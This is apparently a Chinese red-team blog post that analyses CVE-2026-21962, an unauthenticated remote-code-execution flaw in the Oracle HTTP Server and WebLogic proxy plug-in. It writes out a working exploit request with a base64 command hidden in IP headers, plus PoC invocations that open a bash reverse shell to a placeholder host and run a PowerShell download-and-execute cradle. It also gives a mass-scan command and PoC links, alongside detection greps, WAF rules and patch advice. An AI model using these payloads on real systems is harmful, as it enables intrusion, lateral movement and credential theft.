文章总结: CVE-2026-21962是OracleHTTPServer与WebLogic代理插件的满分未授权RCE漏洞。其通过路径穿越绕过与请求头注入链式配合,利用分号盲区绕过内部拦截并在IP头注入Base64命令执行。该漏洞无需凭据,单包即可从边缘代理横向穿透内网,且已在野利用。建议立即应用1月CPU补丁,或部署WAF拦截含分号路径及异常IP头缓解。 综合评分: 91 文章分类: 漏洞分析,漏洞POC,漏洞预警,WEB安全,红队
(10分) CVE-2026-21962:WebLogic代理插件未授权RCE
红队安全圈 红队安全圈
红队安全圈
2026年8月25日 20:00 重庆
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
CVSS 满分 10.0。WebLogic 生态的“门卫”——HTTP Server 和代理插件——自己被攻破了。无需任何凭据,只要目标 HTTP 可达,就能绕过拦截直达内部 Servlet 并执行命令,全程一个请求搞定。已进 CISA KEV(2026-08-24),在野明确遭利用。
01 漏洞速览
漏洞编号CVE-2026-21962
影响产品Oracle HTTP Server / WebLogic 代理插件(Fusion Middleware)
漏洞类型不适当的访问控制 → 未授权 RCE
危害等级CVSS 10.0 严重
是否在野是(CISA KEV 2026-08-24 收录)
已公开 PoC有(GitHub 脚本 / nuclei 模板)
攻击前提无认证,仅需网络可达 HTTP
影响面边缘代理被控 → 横向打进内网 WebLogic 集群 / 数据库
02 漏洞成因:两个坏决定拧在一起
这个洞是“两条独立缺陷的链式配合”,尤其阴的是它打的正是本该保护后端的那层。
缺陷一:路径穿越绕过(Path Traversal Bypass)
代理插件会拦截内部路径 /bea_wls_internal/。但它的 URL 规整化逻辑对分号 ..; 有盲区——遇到分号就以为后面是文件或参数(Matrix 参数),不再剥离穿越序列。于是过滤器看到了“安全路径”,实际却被路由到禁止的内部 Servlet。概念还原(非 Oracle 源码,基于行为与补丁分析推演):
char* path = request->uri;
if (strstr(path, “/bea_wls_internal/”)) return ACCESS_DENIED; // 显式拦截
// 但发送 /weblogic/..;/bea_wls_internal/ 时,
规整化没把 ‘..;’ 解析成上级目录,字符串比对不命中 → 放行
缺陷二:请求头注入(Header Injection)
后端 ProxyServlet 处理客户端 IP 头时按 ; 分号切分,把切出来的第二段 base64 解码后当作命令执行——相当于对 HTTP 头做了 eval。被利用的正是常见的三个转发头:
WL-Proxy-Client-IP / Proxy-Client-IP / X-Forwarded-For
概念还原:
String hdr = request.getHeader(“WL-Proxy-Client-IP”);
if (hdr != null && hdr.contains(“;”)) {
String[] parts = hdr.split(“;”);
String ip = parts[0];
String meta = parts[1]; // 恶意载荷
byte[] payload = Base64.getDecoder().decode(meta);
// 致命错误:直接把载荷当命令执行
executeInternalCommand(payload);
}
两层同时成立的前提,是分号在路径穿越和请求头里都被当成了分隔符而非危险字符——这就是它值 10 分的原因。
03 影响范围
组件受影响 / 修复版本
Oracle HTTP Server12.2.1.4.0 / 14.1.1.0.0 / 14.1.2.0.0
WebLogic 代理插件(Apache)12.2.1.4.0 / 14.1.1.0.0 / 14.1.2.0.0
WebLogic 代理插件(IIS)仅 12.2.1.4.0
修复方式2026 年 1 月 Critical Patch Update
补丁于 2026 年 1 月 20 日随 Oracle 一月 CPU 放出,CISA 在 2026-08-24 将其加入 KEV。
04 PoC / EXP 讲解
利用完全不需要认证、不需要特殊工具,就是单条 HTTP 请求。先构造载荷:命令 cmd:whoami(内部命令语法)base64 编码成 Y21kOndob2FtaQ==,拼到环回 IP 后加个分号:127.0.0.1;Y21kOndob2FtaQ==。
真实流量里被观察到的完整请求(SANS ISC 蜜罐数据):
GET /weblogic//weblogic/..;/bea_wls_internal/ProxyServlet HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (compatible; Exploit/1.0)
WL-Proxy-Client-IP: 127.0.0.1;Y21kOndob2FtaQ==
Proxy-Client-IP: 127.0.0.1;Y21kOndob2FtaQ==
X-Forwarded-For: 127.0.0.1;Y21kOndob2FtaQ==
Connection: close
公开的 Python 脚本用法:
python3 CVE-2026-21962.py http://target:7001 “id && whoami && uname -a”
反连 shell
python3 CVE-2026-21962.py http://target:7001 “bash -i >& /dev/tcp/YOUR_IP/4444 0>&1”
Windows 目标
python3 CVE-2026-21962.py https://target:4443 “powershell -nop -c IEX (New-Object Net.WebClient).DownloadString(‘http://your-server/shell.ps1’)”
批量扫描用 nuclei 模板一把梭:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
命中输出形如:
[CVE-2026-21962] [http] [critical] http://target:7001/weblogic/..;/bea_wls_internal/ProxyServlet
个人提醒一句:目前网上部分 PoC 疑似 AI 生成的半成品,实际碰的时候别照着抄完就当能打,上机验证是必须的。
05 检测与排查
判断自己中没中,抓两个特征:URI 里的 ..; + IP 头里的分号和异常 base64。
在 WebLogic / OHS 访问日志里挑可疑请求
grep -iE “..;|wl-proxy-client-ip|bea_wls_internal” access.log
看代理是否已被打进内网,查可疑子进程
ps aux | grep -E “bash -i|nc |wget|curl” | grep -v grep
防御侧 WAF 两条硬规则:
-
拒绝任何含 ‘..;’ 的 URI
-
拒绝 WL-Proxy-Client-IP / Proxy-Client-IP / X-Forwarded-For 中带分号 ‘;’ 的请求
06 修复建议
立即打 Oracle 2026 年 1 月 Critical Patch Update,覆盖上述所有组件,这是唯一完整修复。
不能立刻补的,至少把管理控制台和代理端点用 VPN / 堡垒机 / 防火墙白名单挡在公网之外,别裸奔。
加 WAF:阻断路径穿越序列和带分号的 IP 转发头。临时缓解可先禁用受影响代理插件,同时持续盯日志里的 wget / curl / nc / bash -i 子进程特征。
07 红队视角
这洞对红队是“教科书级外防入口”。利用门槛低到地板:无认证、网络可达即可,单包触发,不用抢竞态、不用落盘。
位置太香:被攻穿的是 HTTP Server / 代理插件,绝大多数部署在 DMZ,是公网到内部应用服务器的桥。从这个点失手,能直接横向打进内网的数据库和 WebLogic 集群。
权限可观:RCE 跑的是 web 进程权限(常是 oracle / weblogic,配置不当还可能 root),拿到就能改代理逻辑、嗅探过境流量、偷凭据和会话 token。
现实威胁坐实:SANS 蜜罐已观察到来自俄罗斯 IP 的实际扫描请求,CISA 也把它收进 KEV——这不再是理论漏洞。给防守方一句话:代理插件这类边缘守护组件一旦被攻破,封堵成本极高。查一下自己有没有在公网裸奔的 OHS / WebLogic 代理,有就打 CPU,别等别人帮你验证。
08 POC 链接
https://github.com/boroeurnprach/Ashwesker-CVE-2026-21962
https://github.com/George0Papasotiriou/CVE-2026-21962-Oracle-HTTP-Server-WebLogic-Proxy-Plug-in-Critical-
https://dbugs.ptsecurity.com/vulnerability/PT-2026-3709
说明:前两个为 GitHub 公开 PoC 仓库,最后为 Positive Technologies 官方分析。均为授权环境复现,请勿用于未授权目标。
如果文章对您有收获,欢迎关注、点赞、推荐、转发。
— END —
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:红队安全圈 红队安全圈 红队安全圈《(10分) CVE-2026-21962:WebLogic代理插件未授权RCE》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。








评论